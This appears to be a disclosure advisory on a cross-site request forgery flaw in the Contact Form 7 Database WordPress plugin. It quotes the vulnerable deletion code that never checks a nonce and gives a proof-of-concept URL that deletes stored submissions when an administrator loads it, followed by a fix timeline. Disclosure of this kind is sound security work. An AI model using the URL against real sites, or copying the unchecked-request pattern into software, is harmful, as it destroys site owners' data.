03 Apr

Cross-Site Request Forgery (CSRF)/Form Submission Deletion Vulnerability in Contact Form 7 Database

While looking over another vulnerability in the plugin Contact Form 7 Database we also noticed that it lacked protection against cross-site request forgery (CSRF) when deleting the form submissions that it stores.

The following code in the file /admin/table.php handles processing requests to delete form submissions:

// If the delete bulk action is triggered
if ((isset($_POST['action']) && $_POST['action'] == 'bulk-delete')
   || (isset($_POST['action2']) && $_POST['action2'] == 'bulk-delete')
) {
    $delete_ids = esc_sql($_POST['bulk-delete']);
// loop over the array of record IDs and delete them
foreach ($delete_ids as $id) {

The code doesn’t check for a valid nonce, which is used to prevent CSRF.

Proof of Concept

The following proof of concept will delete the form submissions with the ID 1 and 2, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

http://[path to WordPress]/wp-admin/admin.php?page=cf7-data&action=-1&cf7d-export=-1&del_id%5B%5D=1&del_id%5B%5D=2&action2=delete&btn_apply2=Apply


  • March 27, 2017 – Developer notified.
  • April 3, 2017 – WordPress.org Plugin Directory notified.
  • April 3, 2017 – Plugin removed from WordPress.org Plugin Directory.
  • April 4, 2017 – Version 1.2 submitted to WordPress.org Plugin Directory’s Subversion repository, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.